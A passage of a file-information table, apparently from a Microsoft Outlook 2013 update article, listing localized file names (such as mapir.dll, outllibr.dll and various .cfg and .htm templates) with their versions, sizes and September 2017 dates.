| outlwvw.dll_1087 | outlwvw.dll | 15.0.4460.1000 | 126552 | 13-Sep-17 | 05:24 |
| activity.cfg_1042 | activity.cfg | | 962 | 13-Sep-17 | 05:24 |
| appt.cfg_1042 | appt.cfg | | 776 | 13-Sep-17 | 05:24 |
| cnfnot.cfg_1042 | cnfnot.cfg | | 284 | 13-Sep-17 | 05:24 |
| cnfres.cfg_1042 | cnfres.cfg | | 297 | 13-Sep-17 | 05:24 |
| contact.cfg_1042 | contact.cfg | | 782 | 13-Sep-17 | 05:24 |
| currency.htm_1042 | currency.htm | | 581 | 13-Sep-17 | 05:24 |
| dadshirt.htm_1042 | dadshirt.htm | | 566 | 13-Sep-17 | 05:24 |
| distlist.cfg_1042 | distlist.cfg | | 789 | 13-Sep-17 | 05:24 |
| doc.cfg_1042 | doc.cfg | | 761 | 13-Sep-17 | 05:24 |
| envelopr.dll_1042 | envelopr.dll | 15.0.4442.1000 | 17576 | 13-Sep-17 | 05:24 |
| exitem.cfg_1042 | exitem.cfg | | 808 | 13-Sep-17 | 05:24 |
| faxext.ecf_1042 | faxext.ecf | | 838 | 13-Sep-17 | 05:24 |
| infomail.cfg_1042 | infomail.cfg | | 617 | 13-Sep-17 | 05:24 |
| ipm.cfg_1042 | ipm.cfg | | 775 | 13-Sep-17 | 05:24 |
| judgesch.htm_1042 | judgesch.htm | | 580 | 13-Sep-17 | 05:24 |
| jungle.htm_1042 | jungle.htm | | 580 | 13-Sep-17 | 05:24 |
| mapir.dll_1042 | mapir.dll | 15.0.4875.1000 | 1153248 | 13-Sep-17 | 05:24 |
| msspc.ecf_1042 | msspc.ecf | | 770 | 13-Sep-17 | 05:24 |
| note.cfg_1042 | note.cfg | | 783 | 13-Sep-17 | 05:24 |
| notebook.htm_1042 | notebook.htm | | 544 | 13-Sep-17 | 05:24 |
| offisupp.htm_1042 | offisupp.htm | | 532 | 13-Sep-17 | 05:24 |
| ooftmpl.cfg_1042 | ooftmpl.cfg | | 815 | 13-Sep-17 | 05:24 |
| outex.ecf_1042 | outex.ecf | | 1922 | 13-Sep-17 | 05:24 |
| outex2.ecf_1042 | outex2.ecf | | 847 | 13-Sep-17 | 05:24 |
| outllibr.dll_1042 | outllibr.dll | 15.0.4949.1000 | 7551208 | 13-Sep-17 | 05:24 |
| outlperf.ini_1042 | outlperf.ini | | 4948 | 13-Sep-17 | 05:24 |
| outlwvw.dll_1042 | outlwvw.dll | 15.0.4442.1000 | 125568 | 13-Sep-17 | 05:24 |
| pawprint.htm_1042 | pawprint.htm | | 527 | 13-Sep-17 | 05:24 |
| pinelumb.htm_1042 | pinelumb.htm | | 560 | 13-Sep-17 | 05:24 |
| pmailext.ecf_1042 | pmailext.ecf | | 625 | 13-Sep-17 | 05:24 |
| post.cfg_1042 | post.cfg | | 774 | 13-Sep-17 | 05:24 |
| postit.cfg_1042 | postit.cfg | | 779 | 13-Sep-17 | 05:24 |
| rclrpt.cfg_1042 | rclrpt.cfg | | 806 | 13-Sep-17 | 05:24 |
| recall.cfg_1042 | rec.cfg | | 1188 | 13-Sep-17 | 05:24 |
| remote.cfg_1042 | remote.cfg | | 768 | 13-Sep-17 | 05:24 |
| repltmpl.cfg_1042 | repltmpl.cfg | | 829 | 13-Sep-17 | 05:24 |
| report.cfg_1042 | report.cfg | | 785 | 13-Sep-17 | 05:24 |
| resend.cfg_1042 | resend.cfg | | 799 | 13-Sep-17 | 05:24 |
| rssitem.cfg_1042 | rssitem.cfg | | 785 | 13-Sep-17 | 05:24 |
| schdcncl.cfg_1042 | schdcncl.cfg | | 799 | 13-Sep-17 | 05:24 |
| schdreq.cfg_1042 | schdreq.cfg | | 1171 | 13-Sep-17 | 05:24 |
| schdresn.cfg_1042 | schdresn.cfg | | 816 | 13-Sep-17 | 05:24 |
| schdresp.cfg_1042 | schdresp.cfg | | 816 | 13-Sep-17 | 05:24 |
| schdrest.cfg_1042 | schdrest.cfg | | 827 | 13-Sep-17 | 05:24 |
| seamarbl.htm_1042 | seamarbl.htm | | 580 | 13-Sep-17 | 05:24 |
| secrec.cfg_1042 | secrec.cfg | | 662 | 13-Sep-17 | 05:24 |
| secure.cfg_1042 | secure.cfg | | 643 | 13-Sep-17 | 05:24 |
| sharing.cfg_1042 | sharing.cfg | | 753 | 13-Sep-17 | 05:24 |
| sign.cfg_1042 | sign.cfg | | 654 | 13-Sep-17 | 05:24 |
| smimee.cfg_1042 | smimee.cfg | | 646 | 13-Sep-17 | 05:24 |
| smimes.cfg_1042 | smimes.cfg | | 670 | 13-Sep-17 | 05:24 |
| task.cfg_1042 | task.cfg | | 769 | 13-Sep-17 | 05:24 |
| taskacc.cfg_1042 | taskacc.cfg | | 797 | 13-Sep-17 | 05:24 |
| taskdec.cfg_1042 | taskdec.cfg | | 800 | 13-Sep-17 | 05:24 |
| taskreq.cfg_1042 | taskreq.cfg | | 797 | 13-Sep-17 | 05:24 |
| taskupd.cfg_1042 | taskupd.cfg | | 807 | 13-Sep-17 | 05:24 |
| techtool.htm_1042 | techtool.htm | | 537 | 13-Sep-17 | 05:24 |
| envelopr.dll_1063 | envelopr.dll | 15.0.4460.1000 | 19048 | 13-Sep-17 | 05:25 |
| infomail.cfg_1063 | infomail.cfg | | 629 | 13-Sep-17 | 05:25 |
| mapir.dll_1063 | mapir.dll | 15.0.4875.1000 | 1290464 | 13-Sep-17 | 05:25 |
| outllibr.dll_1063 | outllibr.dll | 15.0.4949.1000 | 7983848 | 13-Sep-17 | 05:25 |
| outlwvw.dll_1063 | outlwvw.dll | 15.0.4448.1000 | 125528 | 13-Sep-17 | 05:25 |
| mapir.dll_1062 | mapir.dll | 15.0.4875.1000 | 1283296 | 13-Sep-17 | 05:25 |
| outllibr.dll_1062 | outllibr.dll | 15.0.4949.1000 | 7956712 | 13-Sep-17 | 05:25 |
| outlwvw.dll_1062 | outlwvw.dll | 15.0.4448.1000 | 125504 | 13-Sep-17 | 05:25 |
| currency.htm_1086 | currency.htm | | 623 | 13-Sep-17 | 05:25 |
| dadshirt.htm_1086 | dadshirt.htm | | 558 | 13-Sep-17 | 05:25 |
| envelopr.dll_1086 | envelopr.dll | 15.0.4454.1000 | 19064 | 13-Sep-17 | 05:25 |
| infomail.cfg_1086 | infomail.cfg | | 632 | 13-Sep-17 | 05:25 |
| ipm.cfg_1086 | ipm.cfg | | 805 | 13-Sep-17 | 05:25 |
| judgesch.htm_1086 | judgesch.htm | | 582 | 13-Sep-17 | 05:25 |
| jungle.htm_1086 | jungle.htm | | 588 | 13-Sep-17 | 05:25 |
| mapir.dll_1086 | mapir.dll | 15.0.4875.1000 | 1284832 | 13-Sep-17 | 05:25 |
| msspc.ecf_1086 | msspc.ecf | | 774 | 13-Sep-17 | 05:25 |
| notebook.htm_1086 | notebook.htm | | 568 | 13-Sep-17 | 05:25 |
| offisupp.htm_1086 | offisupp.htm | | 544 | 13-Sep-17 | 05:25 |
| outllibr.dll_1086 | outllibr.dll | 15.0.4949.1000 | 7943400 | 13-Sep-17 | 05:25 |
| outlperf.ini_1086 | outlperf.ini | | 5355 | 13-Sep-17 | 05:25 |
| outlwvw.dll_1086 | outlwvw.dll | 15.0.4442.1000 | 125552 | 13-Sep-17 | 05:25 |
| pawprint.htm_1086 | pawprint.htm | | 551 | 13-Sep-17 | 05:25 |
| pinelumb.htm_1086 | pinelumb.htm | | 564 | 13-Sep-17 | 05:25 |
| seamarbl.htm_1086 | seamarbl.htm | | 584 | 13-Sep-17 | 05:25 |
| techtool.htm_1086 | techtool.htm | | 549 | 13-Sep-17 | 05:25 |
| mapir.dll_1044 | mapir.dll | 15.0.4875.1000 | 1271520 | 13-Sep-17 | 05:25 |
| outllibr.dll_1044 | outllibr.dll | 15.0.4949.1000 | 7902952 | 13-Sep-17 | 05:25 |
| outlwvw.dll_1044 | outlwvw.dll | 15.0.4420.1017 | 125552 | 13-Sep-17 | 05:25 |
| activity.cfg_1043 | activity.cfg | | 999 | 13-Sep-17 | 05:25 |
| appt.cfg_1043 | appt.cfg | | 803 | 13-Sep-17 | 05:25 |
| cnfnot.cfg_1043 | cnfnot.cfg | | 326 | 13-Sep-17 | 05:25 |
| cnfres.cfg_1043 | cnfres.cfg | | 367 | 13-Sep-17 | 05:25 |
| contact.cfg_1043 | contact.cfg | | 817 | 13-Sep-17 | 05:25 |
| currency.htm_1043 | currency.htm | | 623 | 13-Sep-17 | 05:25 |
| dadshirt.htm_1043 | dadshirt.htm | | 558 | 13-Sep-17 | 05:25 |
| distlist.cfg_1043 | distlist.cfg | | 849 | 13-Sep-17 | 05:25 |
| doc.cfg_1043 | doc.cfg | | 799 | 13-Sep-17 | 05:25 |
| envelopr.dll_1043 | envelopr.dll | 15.0.4442.1000 | 19112 | 13-Sep-17 | 05:25 |
| exitem.cfg_1043 | exitem.cfg | | 894 | 13-Sep-17 | 05:25 |
| faxext.ecf_1043 | faxext.ecf | | 828 | 13-Sep-17 | 05:25 |
| infomail.cfg_1043 | infomail.cfg | | 627 | 13-Sep-17 | 05:25 |
| ipm.cfg_1043 | ipm.cfg | | 822 | 13-Sep-17 | 05:25 |
| judgesch.htm_1043 | judgesch.htm | | 582 | 13-Sep-17 | 05:25 |
| jungle.htm_1043 | jungle.htm | | 588 | 13-Sep-17 | 05:25 |
| mapir.dll_1043 | mapir.dll | 15.0.4875.1000 | 1316576 | 13-Sep-17 | 05:25 |
| msspc.ecf_1043 | msspc.ecf | | 778 | 13-Sep-17 | 05:25 |
| note.cfg_1043 | note.cfg | | 801 | 13-Sep-17 | 05:25 |
| notebook.htm_1043 | notebook.htm | | 568 | 13-Sep-17 | 05:25 |
| offisupp.htm_1043 | offisupp.htm | | 544 | 13-Sep-17 | 05:25 |
| ooftmpl.cfg_1043 | ooftmpl.cfg | | 869 | 13-Sep-17 | 05:25 |
| outex.ecf_1043 | outex.ecf | | 1949 | 13-Sep-17 | 05:25 |
| outex2.ecf_1043 | outex2.ecf | | 863 | 13-Sep-17 | 05:25 |
| outllibr.dll_1043 | outllibr.dll | 15.0.4949.1000 | 8011496 | 13-Sep-17 | 05:25 |
| outlperf.ini_1043 | outlperf.ini | | 5481 | 13-Sep-17 | 05:25 |
| outlwvw.dll_1043 | outlwvw.dll | 15.0.4442.1000 | 125552 | 13-Sep-17 | 05:25 |
| pawprint.htm_1043 | pawprint.htm | | 551 | 13-Sep-17 | 05:25 |
| pinelumb.htm_1043 | pinelumb.htm | | 564 | 13-Sep-17 | 05:25 |
| pmailext.ecf_1043 | pmailext.ecf | | 643 | 13-Sep-17 | 05:25 |
| post.cfg_1043 | post.cfg | | 813 | 13-Sep-17 | 05:25 |
| postit.cfg_1043 | postit.cfg | | 807 | 13-Sep-17 | 05:25 |
| rclrpt.cfg_1043 | rclrpt.cfg | | 835 | 13-Sep-17 | 05:25 |
| recall.cfg_1043 | rec.cfg | | 1279 | 13-Sep-17 | 05:25 |
| remote.cfg_1043 | remote.cfg | | 797 | 13-Sep-17 | 05:25 |
| repltmpl.cfg_1043 | repltmpl.cfg | | 869 | 13-Sep-17 | 05:25 |
| report.cfg_1043 | report.cfg | | 816 | 13-Sep-17 | 05:25 |
| resend.cfg_1043 | resend.cfg | | 841 | 13-Sep-17 | 05:25 |
| rssitem.cfg_1043 | rssitem.cfg | | 817 | 13-Sep-17 | 05:25 |
| schdcncl.cfg_1043 | schdcncl.cfg | | 856 | 13-Sep-17 | 05:25 |
| schdreq.cfg_1043 | schdreq.cfg | | 1235 | 13-Sep-17 | 05:25 |
| schdresn.cfg_1043 | schdresn.cfg | | 859 | 13-Sep-17 | 05:25 |
| schdresp.cfg_1043 | schdresp.cfg | | 863 | 13-Sep-17 | 05:25 |
| schdrest.cfg_1043 | schdrest.cfg | | 883 | 13-Sep-17 | 05:25 |
| seamarbl.htm_1043 | seamarbl.htm | | 584 | 13-Sep-17 | 05:25 |
| secrec.cfg_1043 | secrec.cfg | | 656 | 13-Sep-17 | 05:25 |
| secure.cfg_1043 | secure.cfg | | 674 | 13-Sep-17 | 05:25 |
| sharing.cfg_1043 | sharing.cfg | | 826 | 13-Sep-17 | 05:25 |
| sign.cfg_1043 | sign.cfg | | 708 | 13-Sep-17 | 05:25 |
| smimee.cfg_1043 | smimee.cfg | | 680 | 13-Sep-17 | 05:25 |
| smimes.cfg_1043 | smimes.cfg | | 716 | 13-Sep-17 | 05:25 |
| task.cfg_1043 | task.cfg | | 788 | 13-Sep-17 | 05:25 |
| taskacc.cfg_1043 | taskacc.cfg | | 834 | 13-Sep-17 | 05:25 |
| taskdec.cfg_1043 | taskdec.cfg | | 831 | 13-Sep-17 | 05:25 |
| taskreq.cfg_1043 | taskreq.cfg | | 816 | 13-Sep-17 | 05:25 |
| taskupd.cfg_1043 | taskupd.cfg | | 828 | 13-Sep-17 | 05:25 |
| techtool.htm_1043 | techtool.htm | | 549 | 13-Sep-17 | 05:25 |
| envelopr.dll_1045 | envelopr.dll | 15.0.4442.1000 | 19112 | 13-Sep-17 | 05:25 |
| mapir.dll_1045 | mapir.dll | 15.0.4875.1000 | 1310432 | 13-Sep-17 | 05:25 |
| outllibr.dll_1045 | outllibr.dll | 15.0.4949.1000 | 8017128 | 13-Sep-17 | 05:25 |
| outlwvw.dll_1045 | outlwvw.dll | 15.0.4420.1017 | 126064 | 13-Sep-17 | 05:25 |
| activity.cfg_1046 | activity.cfg | | 990 | 13-Sep-17 | 05:25 |
| appt.cfg_1046 | appt.cfg | | 800 | 13-Sep-17 | 05:25 |
| cnfnot.cfg_1046 | cnfnot.cfg | | 349 | 13-Sep-17 | 05:25 |
| cnfres.cfg_1046 | cnfres.cfg | | 366 | 13-Sep-17 | 05:25 |
| contact.cfg_1046 | contact.cfg | | 794 | 13-Sep-17 | 05:25 |
| currency.htm_1046 | currency.htm | | 623 | 13-Sep-17 | 05:25 |
| dadshirt.htm_1046 | dadshirt.htm | | 558 | 13-Sep-17 | 05:25 |
| distlist.cfg_1046 | distlist.cfg | | 825 | 13-Sep-17 | 05:25 |
| doc.cfg_1046 | doc.cfg | | 791 | 13-Sep-17 | 05:25 |
| envelopr.dll_1046 | envelopr.dll | 15.0.4442.1000 | 19112 | 13-Sep-17 | 05:25 |
| exitem.cfg_1046 | exitem.cfg | | 866 | 13-Sep-17 | 05:25 |
| faxext.ecf_1046 | faxext.ecf | | 828 | 13-Sep-17 | 05:25 |
| infomail.cfg_1046 | infomail.cfg | | 651 | 13-Sep-17 | 05:25 |
| ipm.cfg_1046 | ipm.cfg | | 810 | 13-Sep-17 | 05:25 |
| judgesch.htm_1046 | judgesch.htm | | 582 | 13-Sep-17 | 05:25 |
| jungle.htm_1046 | jungle.htm | | 588 | 13-Sep-17 | 05:25 |
| mapir.dll_1046 | mapir.dll | 15.0.4953.1000 | 1307872 | 13-Sep-17 | 05:25 |
| msspc.ecf_1046 | msspc.ecf | | 779 | 13-Sep-17 | 05:25 |
| note.cfg_1046 | note.cfg | | 796 | 13-Sep-17 | 05:25 |
| notebook.htm_1046 | notebook.htm | | 568 | 13-Sep-17 | 05:25 |
| offisupp.htm_1046 | offisupp.htm | | 544 | 13-Sep-17 | 05:25 |
| ooftmpl.cfg_1046 | ooftmpl.cfg | | 851 | 13-Sep-17 | 05:25 |
| outex.ecf_1046 | outex.ecf | | 1940 | 13-Sep-17 | 05:25 |
| outex2.ecf_1046 | outex2.ecf | | 873 | 13-Sep-17 | 05:25 |
| outllibr.dll_1046 | outllibr.dll | 15.0.4953.1000 | 7914728 | 13-Sep-17 | 05:25 |
| outlperf.ini_1046 | outlperf.ini | | 5518 | 13-Sep-17 | 05:25 |
| outlwvw.dll_1046 | outlwvw.dll | 15.0.4442.1000 | 125568 | 13-Sep-17 | 05:25 |
| pawprint.htm_1046 | pawprint.htm | | 551 | 13-Sep-17 | 05:25 |
| pinelumb.htm_1046 | pinelumb.htm | | 564 | 13-Sep-17 | 05:25 |
| pmailext.ecf_1046 | pmailext.ecf | | 652 | 13-Sep-17 | 05:25 |
| post.cfg_1046 | post.cfg | | 802 | 13-Sep-17 | 05:25 |
| postit.cfg_1046 | postit.cfg | | 800 | 13-Sep-17 | 05:25 |
| rclrpt.cfg_1046 | rclrpt.cfg | | 860 | 13-Sep-17 | 05:25 |
| recall.cfg_1046 | rec.cfg | | 1316 | 13-Sep-17 | 05:25 |
| remote.cfg_1046 | remote.cfg | | 793 | 13-Sep-17 | 05:25 |
| repltmpl.cfg_1046 | repltmpl.cfg | | 859 | 13-Sep-17 | 05:25 |
| report.cfg_1046 | report.cfg | | 800 | 13-Sep-17 | 05:25 |
| resend.cfg_1046 | resend.cfg | | 840 | 13-Sep-17 | 05:25 |
| rssitem.cfg_1046 | rssitem.cfg | | 802 | 13-Sep-17 | 05:25 |
| schdcncl.cfg_1046 | schdcncl.cfg | | 831 | 13-Sep-17 | 05:25 |
| schdreq.cfg_1046 | schdreq.cfg | | 1230 | 13-Sep-17 | 05:25 |
| schdresn.cfg_1046 | schdresn.cfg | | 884 | 13-Sep-17 | 05:25 |
| schdresp.cfg_1046 | schdresp.cfg | | 888 | 13-Sep-17 | 05:25 |
| schdrest.cfg_1046 | schdrest.cfg | | 889 | 13-Sep-17 | 05:25 |
| seamarbl.htm_1046 | seamarbl.htm | | 584 | 13-Sep-17 | 05:25 |
| secrec.cfg_1046 | secrec.cfg | | 684 | 13-Sep-17 | 05:25 |
| secure.cfg_1046 | secure.cfg | | 679 | 13-Sep-17 | 05:25 |
| sharing.cfg_1046 | sharing.cfg | | 809 | 13-Sep-17 | 05:25 |
| sign.cfg_1046 | sign.cfg | | 698 | 13-Sep-17 | 05:25 |
| smimee.cfg_1046 | smimee.cfg | | 666 | 13-Sep-17 | 05:25 |
| smimes.cfg_1046 | smimes.cfg | | 699 | 13-Sep-17 | 05:25 |
| task.cfg_1046 | task.cfg | | 783 | 13-Sep-17 | 05:25 |
| taskacc.cfg_1046 | taskacc.cfg | | 836 | 13-Sep-17 | 05:25 |
| taskdec.cfg_1046 | taskdec.cfg | | 834 | 13-Sep-17 | 05:25 |
| taskreq.cfg_1046 | taskreq.cfg | | 826 | 13-Sep-17 | 05:25 |
| taskupd.cfg_1046 | taskupd.cfg | | 836 | 13-Sep-17 | 05:25 |
| techtool.htm_1046 | techtool.htm | | 549 | 13-Sep-17 | 05:25 |
| distlist.cfg_2070 | distlist.cfg | | 843 | 13-Sep-17 | 05:25 |
| envelopr.dll_2070 | envelopr.dll | 15.0.4442.1000 | 19096 | 13-Sep-17 | 05:25 |
| exitem.cfg_2070 | exitem.cfg | | 851 | 13-Sep-17 | 05:25 |
| mapir.dll_2070 | mapir.dll | 15.0.4875.1000 | 1319136 | 13-Sep-17 | 05:25 |
| note.cfg_2070 | note.cfg | | 807 | 13-Sep-17 | 05:25 |
| outllibr.dll_2070 | outllibr.dll | 15.0.4949.1000 | 8001256 | 13-Sep-17 | 05:25 |
| outlperf.ini_2070 | outlperf.ini | | 6004 | 13-Sep-17 | 05:25 |
| outlwvw.dll_2070 | outlwvw.dll | 15.0.4442.1000 | 125568 | 13-Sep-17 | 05:25 |
| taskupd.cfg_2070 | taskupd.cfg | | 830 | 13-Sep-17 | 05:25 |
| envelopr.dll_1048 | envelopr.dll | 15.0.4448.1000 | 19048 | 13-Sep-17 | 05:25 |
| mapir.dll_1048 | mapir.dll | 15.0.4875.1000 | 1300192 | 13-Sep-17 | 05:25 |
| outllibr.dll_1048 | outllibr.dll | 15.0.4949.1000 | 7982824 | 13-Sep-17 | 05:25 |
| outlwvw.dll_1048 | outlwvw.dll | 15.0.4448.1000 | 125504 | 13-Sep-17 | 05:25 |
| activity.cfg_1049 | activity.cfg | | 977 | 13-Sep-17 | 05:24 |
| activity.cfg_1087 | activity.cfg | | 977 | 13-Sep-17 | 05:24 |
| appt.cfg_1049 | appt.cfg | | 783 | 13-Sep-17 | 05:24 |
| appt.cfg_1087 | appt.cfg | | 783 | 13-Sep-17 | 05:24 |
| cnfnot.cfg_1049 | cnfnot.cfg | | 341 | 13-Sep-17 | 05:24 |
| cnfnot.cfg_1087 | cnfnot.cfg | | 341 | 13-Sep-17 | 05:24 |
| cnfres.cfg_1049 | cnfres.cfg | | 380 | 13-Sep-17 | 05:24 |
| cnfres.cfg_1087 | cnfres.cfg | | 380 | 13-Sep-17 | 05:24 |
| contact.cfg_1049 | contact.cfg | | 788 | 13-Sep-17 | 05:24 |
| contact.cfg_1087 | contact.cfg | | 788 | 13-Sep-17 | 05:24 |
| currency.htm_1049 | currency.htm | | 625 | 13-Sep-17 | 05:24 |
| currency.htm_1087 | currency.htm | | 625 | 13-Sep-17 | 05:24 |
| dadshirt.htm_1049 | dadshirt.htm | | 560 | 13-Sep-17 | 05:24 |
| dadshirt.htm_1087 | dadshirt.htm | | 560 | 13-Sep-17 | 05:24 |
| distlist.cfg_1049 | distlist.cfg | | 821 | 13-Sep-17 | 05:24 |
| distlist.cfg_1087 | distlist.cfg | | 821 | 13-Sep-17 | 05:24 |
| doc.cfg_1049 | doc.cfg | | 783 | 13-Sep-17 | 05:24 |
| doc.cfg_1087 | doc.cfg | | 783 | 13-Sep-17 | 05:24 |
| envelopr.dll_1049 | envelopr.dll | 15.0.4442.1000 | 19112 | 13-Sep-17 | 05:25 |
| exitem.cfg_1049 | exitem.cfg | | 845 | 13-Sep-17 | 05:24 |
| exitem.cfg_1087 | exitem.cfg | | 845 | 13-Sep-17 | 05:24 |
| faxext.ecf_1049 | faxext.ecf | | 832 | 13-Sep-17 | 05:24 |
| faxext.ecf_1087 | faxext.ecf | | 832 | 13-Sep-17 | 05:24 |
| infomail.cfg_1049 | infomail.cfg | | 632 | 13-Sep-17 | 05:24 |
| infomail.cfg_1087 | infomail.cfg | | 632 | 13-Sep-17 | 05:24 |
| ipm.cfg_1049 | ipm.cfg | | 802 | 13-Sep-17 | 05:24 |
| ipm.cfg_1087 | ipm.cfg | | 802 | 13-Sep-17 | 05:24 |
| judgesch.htm_1049 | judgesch.htm | | 584 | 13-Sep-17 | 05:24 |
| judgesch.htm_1087 | judgesch.htm | | 584 | 13-Sep-17 | 05:24 |
| jungle.htm_1049 | jungle.htm | | 590 | 13-Sep-17 | 05:24 |
| jungle.htm_1087 | jungle.htm | | 590 | 13-Sep-17 | 05:24 |
| mapir.dll_1049 | mapir.dll | 15.0.4875.1000 | 1287392 | 13-Sep-17 | 05:25 |
| msspc.ecf_1049 | msspc.ecf | | 782 | 13-Sep-17 | 05:24 |
| msspc.ecf_1087 | msspc.ecf | | 782 | 13-Sep-17 | 05:24 |
| note.cfg_1049 | note.cfg | | 781 | 13-Sep-17 | 05:24 |
| note.cfg_1087 | note.cfg | | 781 | 13-Sep-17 | 05:24 |
| notebook.htm_1049 | notebook.htm | | 570 | 13-Sep-17 | 05:24 |
| notebook.htm_1087 | notebook.htm | | 570 | 13-Sep-17 | 05:24 |
| offisupp.htm_1049 | offisupp.htm | | 546 | 13-Sep-17 | 05:24 |
| offisupp.htm_1087 | offisupp.htm | | 546 | 13-Sep-17 | 05:24 |
| ooftmpl.cfg_1049 | ooftmpl.cfg | | 819 | 13-Sep-17 | 05:24 |
| ooftmpl.cfg_1087 | ooftmpl.cfg | | 819 | 13-Sep-17 | 05:24 |
| outex.ecf_1049 | outex.ecf | | 1927 | 13-Sep-17 | 05:24 |
| outex.ecf_1087 | outex.ecf | | 1927 | 13-Sep-17 | 05:24 |
| outex2.ecf_1049 | outex2.ecf | | 854 | 13-Sep-17 | 05:24 |
| outex2.ecf_1087 | outex2.ecf | | 854 | 13-Sep-17 | 05:24 |
| outllibr.dll_1049 | outllibr.dll | 15.0.4971.1000 | 7964392 | 13-Sep-17 | 05:25 |
| outlperf.ini_1049 | outlperf.ini | | 5515 | 13-Sep-17 | 05:24 |
| outlperf.ini_1059 | outlperf.ini | | 5515 | | |
| outlperf.ini_1064 | outlperf.ini | | 5515 | | |
| outlperf.ini_1087 | outlperf.ini | | 5515 | 13-Sep-17 | 05:24 |
| outlperf.ini_1088 | outlperf.ini | | 5515 | | |
| outlperf.ini_1090 | outlperf.ini | | 5515 | | |
| outlperf.ini_1092 | outlperf.ini | | 5515 | | |
| outlwvw.dll_1049 | outlwvw.dll | 15.0.4442.1000 | 125568 | 13-Sep-17 | 05:25 |
| pawprint.htm_1049 | pawprint.htm | | 553 | 13-Sep-17 | 05:24 |
| pawprint.htm_1087 | pawprint.htm | | 553 | 13-Sep-17 | 05:24 |
| pinelumb.htm_1049 | pinelumb.htm | | 566 | 13-Sep-17 | 05:24 |
| pinelumb.htm_1087 | pinelumb.htm | | 566 | 13-Sep-17 | 05:24 |
| pmailext.ecf_1049 | pmailext.ecf | | 639 | 13-Sep-17 | 05:24 |
| pmailext.ecf_1087 | pmailext.ecf | | 639 | 13-Sep-17 | 05:24 |
| post.cfg_1049 | post.cfg | | 792 | 13-Sep-17 | 05:24 |
| post.cfg_1087 | post.cfg | | 792 | 13-Sep-17 | 05:24 |
| postit.cfg_1049 | postit.cfg | | 787 | 13-Sep-17 | 05:24 |
| postit.cfg_1087 | postit.cfg | | 787 | 13-Sep-17 | 05:24 |
| rclrpt.cfg_1049 | rclrpt.cfg | | 825 | 13-Sep-17 | 05:24 |
| rclrpt.cfg_1087 | rclrpt.cfg | | 825 | 13-Sep-17 | 05:24 |
| recall.cfg_1049 | rec.cfg | | 1257 | 13-Sep-17 | 05:24 |
| recall.cfg_1087 | rec.cfg | | 1257 | 13-Sep-17 | 05:24 |
| remote.cfg_1049 | remote.cfg | | 799 | 13-Sep-17 | 05:24 |
| remote.cfg_1087 | remote.cfg | | 799 | 13-Sep-17 | 05:24 |
| repltmpl.cfg_1049 | repltmpl.cfg | | 812 | 13-Sep-17 | 05:24 |
| repltmpl.cfg_1087 | repltmpl.cfg | | 812 | 13-Sep-17 | 05:24 |
| report.cfg_1049 | report.cfg | | 794 | 13-Sep-17 | 05:24 |
| report.cfg_1087 | report.cfg | | 794 | 13-Sep-17 | 05:24 |
| resend.cfg_1049 | resend.cfg | | 806 | 13-Sep-17 | 05:24 |
| resend.cfg_1087 | resend.cfg | | 806 | 13-Sep-17 | 05:24 |
| rssitem.cfg_1049 | rssitem.cfg | | 800 | 13-Sep-17 | 05:24 |
| rssitem.cfg_1087 | rssitem.cfg | | 800 | 13-Sep-17 | 05:24 |
| schdcncl.cfg_1049 | schdcncl.cfg | | 811 | 13-Sep-17 | 05:24 |
| schdcncl.cfg_1087 | schdcncl.cfg | | 811 | 13-Sep-17 | 05:24 |
| schdreq.cfg_1049 | schdreq.cfg | | 1230 | 13-Sep-17 | 05:24 |
| schdreq.cfg_1087 | schdreq.cfg | | 1230 | 13-Sep-17 | 05:24 |
| schdresn.cfg_1049 | schdresn.cfg | | 837 | 13-Sep-17 | 05:24 |
| schdresn.cfg_1087 | schdresn.cfg | | 837 | 13-Sep-17 | 05:24 |
| schdresp.cfg_1049 | schdresp.cfg | | 833 | 13-Sep-17 | 05:24 |
| schdresp.cfg_1087 | schdresp.cfg | | 833 | 13-Sep-17 | 05:24 |
| schdrest.cfg_1049 | schdrest.cfg | | 849 | 13-Sep-17 | 05:24 |
| schdrest.cfg_1087 | schdrest.cfg | | 849 | 13-Sep-17 | 05:24 |
| seamarbl.htm_1049 | seamarbl.htm | | 586 | 13-Sep-17 | 05:24 |
| seamarbl.htm_1087 | seamarbl.htm | | 586 | 13-Sep-17 | 05:24 |
| secrec.cfg_1049 | secrec.cfg | | 681 | 13-Sep-17 | 05:24 |
| secrec.cfg_1087 | secrec.cfg | | 681 | 13-Sep-17 | 05:24 |
| secure.cfg_1049 | secure.cfg | | 647 | 13-Sep-17 | 05:24 |
| secure.cfg_1087 | secure.cfg | | 647 | 13-Sep-17 | 05:24 |
| sharing.cfg_1049 | sharing.cfg | | 795 | 13-Sep-17 | 05:24 |
| sharing.cfg_1087 | sharing.cfg | | 795 | 13-Sep-17 | 05:24 |
| sign.cfg_1049 | sign.cfg | | 666 | 13-Sep-17 | 05:24 |
| sign.cfg_1087 | sign.cfg | | 666 | 13-Sep-17 | 05:24 |
| smimee.cfg_1049 | smimee.cfg | | 655 | 13-Sep-17 | 05:24 |
| smimee.cfg_1087 | smimee.cfg | | 655 | 13-Sep-17 | 05:24 |
| smimes.cfg_1049 | smimes.cfg | | 681 | 13-Sep-17 | 05:24 |
| smimes.cfg_1087 | smimes.cfg | | 681 | 13-Sep-17 | 05:24 |
| task.cfg_1049 | task.cfg | | 774 | 13-Sep-17 | 05:24 |
| task.cfg_1087 | task.cfg | | 774 | 13-Sep-17 | 05:24 |
| taskacc.cfg_1049 | taskacc.cfg | | 808 | 13-Sep-17 | 05:24 |
| taskacc.cfg_1087 | taskacc.cfg | | 808 | 13-Sep-17 | 05:24 |
| taskdec.cfg_1049 | taskdec.cfg | | 807 | 13-Sep-17 | 05:24 |
| taskdec.cfg_1087 | taskdec.cfg | | 807 | 13-Sep-17 | 05:24 |
| taskreq.cfg_1049 | taskreq.cfg | | 794 | 13-Sep-17 | 05:24 |
| taskreq.cfg_1087 | taskreq.cfg | | 794 | 13-Sep-17 | 05:24 |
| taskupd.cfg_1049 | taskupd.cfg | | 812 | 13-Sep-17 | 05:24 |
| taskupd.cfg_1087 | taskupd.cfg | | 812 | 13-Sep-17 | 05:24 |
| techtool.htm_1049 | techtool.htm | | 551 | 13-Sep-17 | 05:24 |
| techtool.htm_1087 | techtool.htm | | 551 | 13-Sep-17 | 05:24 |
| dadshirt.htm_1051 | dadshirt.htm | | 560 | 13-Sep-17 | 05:25 |
| envelopr.dll_1051 | envelopr.dll | 15.0.4454.1000 | 19064 | 13-Sep-17 | 05:25 |
| mapir.dll_1051 | mapir.dll | 15.0.4875.1000 | 1300192 | 13-Sep-17 | 05:25 |
